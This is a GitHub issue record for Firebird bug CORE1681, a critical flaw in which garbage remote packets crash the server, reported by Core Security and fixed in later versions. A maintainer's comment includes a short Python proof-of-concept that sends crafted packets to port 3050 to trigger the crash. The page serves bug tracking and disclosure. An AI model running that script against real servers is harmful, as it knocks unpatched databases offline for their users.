Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Garbage data in the incoming remote packet may crash the server [CORE1681] #2106

Closed
firebird-automations opened this issue Jan 9, 2008 · 11 comments
Closed

Garbage data in the incoming remote packet may crash the server [CORE1681] #2106

firebird-automations opened this issue Jan 9, 2008 · 11 comments
Assignees
@dyemanov
Labels
affect-version: 1.0.3 affect-version: 1.5.4 affect-version: 1.5.5 affect-version: 2.0.0 affect-version: 2.0.1 affect-version: 2.0.2 affect-version: 2.0.3 affect-version: 2.1 Beta 2 fix-version: 1.5.6 fix-version: 2.0.4 fix-version: 2.1 RC1 priority: critical qa: cannot be tested type: bug

Comments

@firebird-automations
Copy link
Collaborator

Submitted by: @dyemanov

If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

Commits: 3201c3d 84a0dc8 ee8fdef
@firebird-automations
Copy link
Collaborator Author

Commented by: @dyemanov

The affected packet types are: op_receive, op_start, op_start_and_receive, op_send, op_start_and_send, op_start_send_and_receive. The bug is caused by lack of validation for a not yet allocated port_object_vector in a few places of the remote subsystem.

Test case in Python:

import socket
import time

def getTargetIP():
return '127.0.0.1'

port = 3050
op = '\x4a'

packet = '\x00\x00\x00' + op + 'A' * 2000

for i in range(0, 5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((getTargetIP(), port))
s.send(str(packet))
s.close()
time.sleep(1)

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

Fix Version: 2.0.4 [ 10211 ]

Fix Version: 1.5.6 [ 10225 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

Fix Version: 2.1 RC1 [ 10201 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs.

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ] =>

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

@firebird-automations
Copy link
Collaborator Author

Modified by: @pcisar

Workflow: jira [ 13806 ] => Firebird [ 14118 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

QA Status: No test

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Cannot be tested

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@dyemanov dyemanov

Labels
affect-version: 1.0.3 affect-version: 1.5.4 affect-version: 1.5.5 affect-version: 2.0.0 affect-version: 2.0.1 affect-version: 2.0.2 affect-version: 2.0.3 affect-version: 2.1 Beta 2 fix-version: 1.5.6 fix-version: 2.0.4 fix-version: 2.1 RC1 priority: critical qa: cannot be tested type: bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@dyemanov @firebird-automations